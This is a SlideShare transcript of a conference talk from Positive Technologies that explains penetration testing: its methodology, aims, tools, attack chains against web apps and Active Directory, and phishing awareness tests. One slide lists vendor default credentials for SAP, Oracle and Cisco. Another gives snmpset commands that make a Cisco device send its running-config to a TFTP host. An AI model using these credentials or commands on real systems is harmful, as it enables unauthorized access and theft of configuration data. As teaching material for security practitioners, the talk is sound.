Penetration testing, What’s this?


Published on

Published in: Technology
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide
  • Легенда: English alphabet characters in lower case, figures and special suymbols Other symbols
  • Penetration testing, What’s this?

    1. 1. Penetration testing What’s this? Dmitry Evteev ( Positive Technologies)
    2. 2. Penetration testing internals <ul><li>Penetration testing != simulation of (un)real attacker activities </li></ul><ul><li>Penetration testing != instrumental scanning with manual vulnerability verification </li></ul><ul><li>Penetration testing – </li></ul><ul><ul><li>is a complex of activities aimed to estimate current security process status; </li></ul></ul><ul><ul><li>is a testing of protection bypassing; </li></ul></ul><ul><ul><li>is one of security audit methods. </li></ul></ul>
    3. 3. Methodology <ul><li>On the one hand, the following best practices are used: </li></ul><ul><ul><li>Open Source Security Testing Methodology Manual (OSSTMM) </li></ul></ul><ul><ul><li>Web Application Security Consortium (WASC) </li></ul></ul><ul><ul><li>Open Web Application Security Project (OWASP) </li></ul></ul><ul><ul><li>… </li></ul></ul><ul><li>On the other hand, the following standards are used: </li></ul><ul><ul><li>Center of Internet Security (CIS) guides </li></ul></ul><ul><ul><li>ISO 2700x series standards </li></ul></ul><ul><ul><li>… </li></ul></ul>
    4. 4. Abilities Protection mechanism N … X Incident management Some activities were detected but not identified as an attack . 2 Protection mechanism N … X
    5. 5. Aims <ul><li>High-level </li></ul><ul><ul><li>Internal policy ( pentest as an instrument of pressure ) </li></ul></ul><ul><ul><li>Estimation of current security processes </li></ul></ul><ul><ul><li>Should be done ( compliance ) </li></ul></ul><ul><li>Technological </li></ul><ul><ul><li>Get unauthorized access to internal network from the Internet </li></ul></ul><ul><ul><li>Gain maximum privileges in main infrastructure systems ( Active Directory, network hardware , DBMS , ERP, etc. ) </li></ul></ul><ul><ul><li>Get access to certain information resources </li></ul></ul><ul><ul><li>Get access to certain data ( information ) </li></ul></ul>
    6. 6. Approaches <ul><li>Perimeter pentest ( with further attacks in internal network ) </li></ul><ul><ul><li>With or without administrator awareness </li></ul></ul><ul><ul><li>Wireless network security analysis </li></ul></ul><ul><li>Internal pentest </li></ul><ul><ul><li>From average user working station </li></ul></ul><ul><ul><li>From chosen network segment </li></ul></ul><ul><li>Certain information system component testing ( security analysis ) </li></ul><ul><ul><li>Black, Grey and White Box </li></ul></ul><ul><li>Assessment of employee awareness in information security </li></ul>
    7. 7. Real attack VS penetration testing <ul><li>For direct executor pentset is HACKING ! </li></ul><ul><li>Limitations </li></ul><ul><ul><li>Compliance with Russian Federation legislation </li></ul></ul><ul><ul><li>Limited time </li></ul></ul><ul><ul><li>Minimum impact </li></ul></ul><ul><ul><li>No testing like DDoS </li></ul></ul><ul><li>Inconveniences </li></ul><ul><ul><li>Coordination of actions ( it can run into a very absurd extreme !) </li></ul></ul><ul><ul><li>Responsibility/Punctuality </li></ul></ul><ul><li>Advantages </li></ul><ul><ul><li>Do not need to hide the activities </li></ul></ul><ul><ul><li>Simplify the network perimeter identification process </li></ul></ul><ul><ul><li>A possibility to use Grey and White Box methods </li></ul></ul>
    8. 8. Instruments <ul><li>Positive Technologies MaxPatrol </li></ul><ul><li>Nmap/dnsenum/dig … </li></ul><ul><li>… </li></ul><ul><li>Immunity Canvas (VulnDisco, Agora Pack, Voip Pack) </li></ul><ul><li>Metasploit </li></ul><ul><li>… </li></ul><ul><li>THC Hydra/THC PPTP bruter/ncrack … </li></ul><ul><li>Cain and Abel/Wireshark </li></ul><ul><li>Aircrack </li></ul><ul><li>… </li></ul><ul><li>Yersinia </li></ul><ul><li>… </li></ul><ul><li>Browser , notepad … </li></ul>
    9. 9. web application security problem <ul><ul><li>The most frequent web application vulnerabilities detected by “Black Box” method ( 2009 statistics , ) </li></ul></ul>
    10. 10. Pentest example: web applications <ul><li>What is web application pentest by BlackBox method? (real world) </li></ul>web server auditor working station Check 1 Check N Vulnerability is detected <ul><li>Vulnerability 1: password bruteforce Impact: access to application ( with limited privileges ) </li></ul><ul><li>Vulnerability 2: SQL injection Impact: file reading only (magic quotes option is enabled ) </li></ul>Vulnerability is detected <ul><li>Vulnerability 3: path traversal Impact: file reading only ( potentially LFI) </li></ul><ul><li>Vulnerability 4: predictable identifier of loaded file Vulnerability 3 + Vulnerability 4 = Impact: commands execution on server </li></ul><ul><li>Next step – FURTHER ATTACK </li></ul>
    11. 11. Weak password problem <ul><li>The recommended password policy is used </li></ul><ul><li>What is domain administrator password? </li></ul>(coincide with login)
    12. 12. Pentest example: Password bruteforce ( defaults ) <ul><li>Well known </li></ul><ul><ul><li>admin:123456 </li></ul></ul><ul><ul><li>Administrator:P@ssw0rd </li></ul></ul><ul><ul><li>… </li></ul></ul><ul><li>SAP </li></ul><ul><ul><li>(DIAG) SAP*: 06071992, PASS </li></ul></ul><ul><ul><li>mandants : 000, 001, 066, all new </li></ul></ul><ul><ul><li>(RFC) SAPCPIC: ADMIN </li></ul></ul><ul><ul><li>mandants :000, 001, 066, all new </li></ul></ul><ul><ul><li>… </li></ul></ul><ul><li>Oracle </li></ul><ul><ul><li>sys:manager </li></ul></ul><ul><ul><li>sys:change_on_install </li></ul></ul><ul><ul><li>… </li></ul></ul><ul><li>Cisco </li></ul><ul><ul><li>Cisco:Cisco </li></ul></ul><ul><ul><li>… </li></ul></ul><ul><li>… </li></ul>
    13. 13. Pentest example: Hello, Pavlik :) <ul><li>snmpset -v 1 -c private <cisco> . integer 1 </li></ul><ul><li>snmpset -v 1 -c private <cisco> . integer 4 </li></ul><ul><li>snmpset -v 1 -c private <cisco> . integer 1 </li></ul><ul><li>snmpset -v 1 -c private <cisco> . address <tftp_host> </li></ul><ul><li>snmpset -v 1 -c private <cisco> . string running-config </li></ul><ul><li>snmpset -v 1 -c private <cisco> . integer 1 </li></ul><ul><li>snmpset -v 1 -c private <cisco> . integer 6 </li></ul>
    14. 14. The problem of access control <ul><li>Network access </li></ul><ul><ul><li>Network architecture ( DMZ , technological network , user segment , testing environment ) </li></ul></ul><ul><ul><li>Remote network access </li></ul></ul><ul><li>Data access </li></ul><ul><ul><li>Shared resources ( password in clear text , data backup copy , different sensitive data ) </li></ul></ul><ul><ul><li>Web applications , DBMS , ERP </li></ul></ul>
    15. 15. The problem of access control <ul><li>Division of privileges among administrators </li></ul><ul><li>Users with extended privileges </li></ul><ul><li>Services (!) with more than required access level </li></ul><ul><li>General problem of identifiers management </li></ul>
    16. 16. Pentest example: Use of vulnerabilities <ul><li>CANVAS && Metasploit </li></ul>
    17. 17. Pentest example: Privilege Extension in Active Directory <ul><li>Version 1 : Password bruteforce </li></ul><ul><li>Version 2 : Vulnerabilities in controller domain services </li></ul><ul><li>Version 3 : Pass-the-hash attack </li></ul><ul><li>Version 4: Create new user from domain computer </li></ul><ul><li>Version 5 : Conduct attack « Poisoning ARP cash » ( for example , hijack RDP session, lower authentication level to LM ) </li></ul><ul><li>Version 6: NTLM Relay attack </li></ul><ul><li>Version 7: Find and restore system state domain ( for example , after successful attack on backup server ) </li></ul><ul><li>Version 8 : Get extended privileges owing to other systems ( for example , control items in company’s root DNS ) </li></ul><ul><li>Version 9 : Get extended privileges via other systems’ vulnerabilities ( passwords are stored with reversible encryption , insecure protocols are used, etc. ) </li></ul><ul><li>Version N … </li></ul>
    18. 18. Pentest example: Security analysis <ul><li>Network scanning </li></ul><ul><li>Password is bruteforced ! </li></ul><ul><ul><li>Exploitation of SQL Injection </li></ul></ul><ul><ul><li>Command execution on server </li></ul></ul><ul><ul><li>Privilege gaining </li></ul></ul><ul><ul><li>Internal resources attack </li></ul></ul><ul><ul><li>Internal pentest </li></ul></ul><ul><ul><li>Install MaxPatrol scanner </li></ul></ul><ul><ul><li>Find vulnerabilities </li></ul></ul><ul><ul><li>Exploit vulnerabilities </li></ul></ul><ul><ul><li>Move to network of the Head office </li></ul></ul><ul><ul><li>Conduct attacks on Head office resources </li></ul></ul><ul><ul><li>Get maximum privileges in the whole network ! </li></ul></ul>
    19. 19. Pentest example: Security analysis
    20. 20. Pentest example: Wireless networks
    21. 21. Pentest example: Assessment of awareness program efficiency <ul><li>Send provocative messages via e-mail </li></ul><ul><li>Send provocative messages via ICQ ( and other IM) </li></ul><ul><li>Distribute data media with provocative messages </li></ul><ul><li>Question employees </li></ul><ul><li>Talks ( by telephone , skype ) </li></ul>
    22. 22. Pentest example: Example of a set of checks Note description Attack Monitored events A note from authority with attached executable file . Spread of network worms . System infection with Trojan horse . Open the mailbox . Execute the attached file . A note from internal person with link to web site . The link points to an executable file . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Load file from w eb server . Execute the file . A note from authority with link to web site . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Follow the link .
    23. 23. Pentest example: Assessment of awareness program effeciency Users that follow the link (only 1 pentest) Users that follow the link (regular pentest)
    24. 24. Conclusions <ul><li>Penetration testing </li></ul><ul><li>– is a number of activities that allows to make efficient assessment of current security processes </li></ul><ul><li>Penetration testing </li></ul><ul><li>– is search and use of flows in security processes </li></ul><ul><ul><li>vulnerability management </li></ul></ul><ul><ul><li>configuration management </li></ul></ul><ul><ul><li>incident management </li></ul></ul><ul><ul><li>security management of web applications, DBMS , ERP, wire and wireless networks, etc. </li></ul></ul><ul><ul><li>etc. </li></ul></ul>
    25. 25. Thank you for your attention ! Any questions? [email_address]